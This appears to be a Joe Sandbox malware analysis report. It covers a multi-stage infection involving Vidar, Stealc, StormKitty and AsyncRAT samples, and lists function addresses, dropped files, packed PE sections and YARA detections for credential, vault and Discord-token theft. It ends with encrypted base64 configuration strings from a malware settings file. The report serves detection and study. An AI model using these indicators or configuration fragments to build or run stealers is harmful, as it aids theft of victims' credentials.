Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C533D00	3_2_6C533D00
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5A1DC0	3_2_6C5A1DC0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4C3D80	3_2_6C4C3D80
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C619D90	3_2_6C619D90
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C655E60	3_2_6C655E60
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C62BE70	3_2_6C62BE70
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5DDE10	3_2_6C5DDE10
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4F3EC0	3_2_6C4F3EC0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C627F20	3_2_6C627F20
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C505F20	3_2_6C505F20
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4C5F30	3_2_6C4C5F30
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5EDFC0	3_2_6C5EDFC0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C653FC0	3_2_6C653FC0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C57BFF0	3_2_6C57BFF0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4F1F90	3_2_6C4F1F90
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C52D810	3_2_6C52D810
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C62B8F0	3_2_6C62B8F0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5AF8F0	3_2_6C5AF8F0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4DD8E0	3_2_6C4DD8E0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5038E0	3_2_6C5038E0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C54F960	3_2_6C54F960
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C58D960	3_2_6C58D960
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C61F900	3_2_6C61F900
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C585920	3_2_6C585920
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5099D0	3_2_6C5099D0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5699C0	3_2_6C5699C0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5359F0	3_2_6C5359F0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5679F0	3_2_6C5679F0
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5A1990	3_2_6C5A1990
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C4E1980	3_2_6C4E1980
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C659A50	3_2_6C659A50
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C50FA10	3_2_6C50FA10
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: 3_2_6C5CDA30	3_2_6C5CDA30

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: String function: 6C52C5E0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: String function: 6C609F30 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: String function: 6C4F9B10 appears 88 times
Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe	Code function: String function: 6C4F3620 appears 83 times

Source: ukX1YE2[1].exe.11.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 2125147 bytes, 2 files, at 0x2c +A "soonmaiintain.exe" +A "soonmaintain.exe", ID 3433, number 1, 101 datablocks, 0x1503 compression
Source: ukX1YE2.exe.11.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 2125147 bytes, 2 files, at 0x2c +A "soonmaiintain.exe" +A "soonmaintain.exe", ID 3433, number 1, 101 datablocks, 0x1503 compression
Source: random[2].exe.11.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 2125147 bytes, 2 files, at 0x2c +A "soonmaiintain.exe" +A "soonmaintain.exe", ID 3433, number 1, 101 datablocks, 0x1503 compression
Source: 4f6ebb22d5.exe.11.dr	Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 2125147 bytes, 2 files, at 0x2c +A "soonmaiintain.exe" +A "soonmaintain.exe", ID 3433, number 1, 101 datablocks, 0x1503 compression
Source: random[3].exe0.11.dr	Static PE information: Resource name: 7:7RHPPQUO:SI=FWI type: DOS executable (COM, 0x8C-variant)
Source: random[3].exe0.11.dr	Static PE information: Resource name: F\|R\|ON\:LRWVX type: DOS executable (COM, 0x8C-variant)
Source: random[3].exe0.11.dr	Static PE information: Resource name: ]VH<LUTRI;X5SOG\OTVJLT type: DOS executable (COM)
Source: 5f4a2ffa3a.exe.11.dr	Static PE information: Resource name: 7:7RHPPQUO:SI=FWI type: DOS executable (COM, 0x8C-variant)
Source: 5f4a2ffa3a.exe.11.dr	Static PE information: Resource name: F\|R\|ON\:LRWVX type: DOS executable (COM, 0x8C-variant)
Source: 5f4a2ffa3a.exe.11.dr	Static PE information: Resource name: ]VH<LUTRI;X5SOG\OTVJLT type: DOS executable (COM)

Source: hmUaBuJ.exe.11.dr	Static PE information: No import functions for PE file found
Source: hmUaBuJ[1].exe.11.dr	Static PE information: No import functions for PE file found

Source: hmUaBuJ.exe.11.dr	Static PE information: Data appended to the last section found
Source: hmUaBuJ[1].exe.11.dr	Static PE information: Data appended to the last section found

Source: i8Vwc7iOaG.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 20.2.52ba7a538c.exe.1e58000.2.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 11.3.skotes.exe.9d0e9d.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 20.2.52ba7a538c.exe.1e32000.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 20.2.52ba7a538c.exe.1e0c000.3.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 26.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 26.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 26.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 20.2.52ba7a538c.exe.1e32000.1.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 20.2.52ba7a538c.exe.1e0c000.3.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 29.0.t0IHakP.exe.d00000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 20.2.52ba7a538c.exe.1e58000.2.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 3.2.Y71AV1VIPLT8Y663WBDXSB.exe.c40000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
Source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000001D.00000000.3567621377.0000000000D02000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0000001D.00000002.4813359985.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0000000B.00000003.3567702687.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000B.00000003.4044838292.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000B.00000003.3567876163.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000B.00000003.3761299972.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000014.00000002.3410807562.0000000001E32000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 00000014.00000002.3410807562.0000000001E58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0000000B.00000003.3763224367.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000B.00000003.4048760844.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000014.00000002.3410807562.0000000001F4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000014.00000002.3410807562.0000000001E0C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
Source: 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: skotes.exe PID: 7608, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: t0IHakP.exe PID: 8100, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: t0IHakP.exe PID: 8100, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe, type: DROPPED	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\t0IHakP[1].exe, type: DROPPED	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_valenciga[1].exe, type: DROPPED	Matched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe, type: DROPPED	Matched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b

Source: soonmaiintain.exe.24.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: i8Vwc7iOaG.exe	Static PE information: Section: ZLIB complexity 0.9996361825980392
Source: i8Vwc7iOaG.exe	Static PE information: Section: niowkeag ZLIB complexity 0.9943491180981595
Source: random[1].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9976051600817438
Source: random[1].exe.11.dr	Static PE information: Section: csnwaitg ZLIB complexity 0.994775169683258
Source: 5fe60d6c80.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9976051600817438
Source: 5fe60d6c80.exe.11.dr	Static PE information: Section: csnwaitg ZLIB complexity 0.994775169683258
Source: UfEglUg[1].exe.11.dr	Static PE information: Section: .bss ZLIB complexity 1.0003260588842975
Source: UfEglUg.exe.11.dr	Static PE information: Section: .bss ZLIB complexity 1.0003260588842975
Source: k0ukcEH[1].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9971773330479452
Source: k0ukcEH[1].exe.11.dr	Static PE information: Section: dqaezxce ZLIB complexity 0.99471435546875
Source: k0ukcEH.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9971773330479452
Source: k0ukcEH.exe.11.dr	Static PE information: Section: dqaezxce ZLIB complexity 0.99471435546875
Source: random[1].exe0.11.dr	Static PE information: Section: .bss ZLIB complexity 1.0003244500411184
Source: dea82620d5.exe.11.dr	Static PE information: Section: .bss ZLIB complexity 1.0003244500411184
Source: random[4].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9996425653594772
Source: 7d66ff7c35.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9996425653594772
Source: random[2].exe0.11.dr	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491
Source: 5f7e5e6f99.exe.11.dr	Static PE information: Section: .bss ZLIB complexity 1.0003343485169491
Source: random[5].exe.11.dr	Static PE information: Section: jbmcqnop ZLIB complexity 0.994540582337884
Source: fe4b3524c6.exe.11.dr	Static PE information: Section: jbmcqnop ZLIB complexity 0.994540582337884
Source: random[4].exe0.11.dr	Static PE information: Section: ZLIB complexity 0.9971773330479452
Source: random[4].exe0.11.dr	Static PE information: Section: dqaezxce ZLIB complexity 0.99471435546875
Source: 98f8ef74ec.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9971773330479452
Source: 98f8ef74ec.exe.11.dr	Static PE information: Section: dqaezxce ZLIB complexity 0.99471435546875
Source: random[1].exe1.11.dr	Static PE information: Section: ZLIB complexity 0.9994702308006536
Source: random[1].exe1.11.dr	Static PE information: Section: rnotmvkb ZLIB complexity 0.9946751644736842
Source: fd096224d5.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9994702308006536
Source: fd096224d5.exe.11.dr	Static PE information: Section: rnotmvkb ZLIB complexity 0.9946751644736842
Source: axplong.exe.21.dr	Static PE information: Section: ZLIB complexity 0.9976051600817438
Source: axplong.exe.21.dr	Static PE information: Section: csnwaitg ZLIB complexity 0.994775169683258

Source: t0IHakP.exe.11.dr, Settings.cs

Base64 encoded string: 'Z5pZYvRJIFTn8wlNIbceeqsxsKyiih9zS9G1Q49QpoEQOhv8FIVYhJy3JtaDzo7YHrinzRvWHLMY6KkdaCxT9w==', 'lv3eVVbrtyehpFQQS+O85pqbqHpE531GsoTORjAIVkmXnn29fizpHaeprUcfXfR7i1rDsUVnA0uHFazCOt353g==', 'vx/BE7jbRUB6mf7JvBe7Aqms5ens79dF75erQeF42sT5vvO+4N9X2zk0aqxqkuguWA/A06An2byEZbqi5N4oc6eDd74t2bt19gesw0UIL8c=', 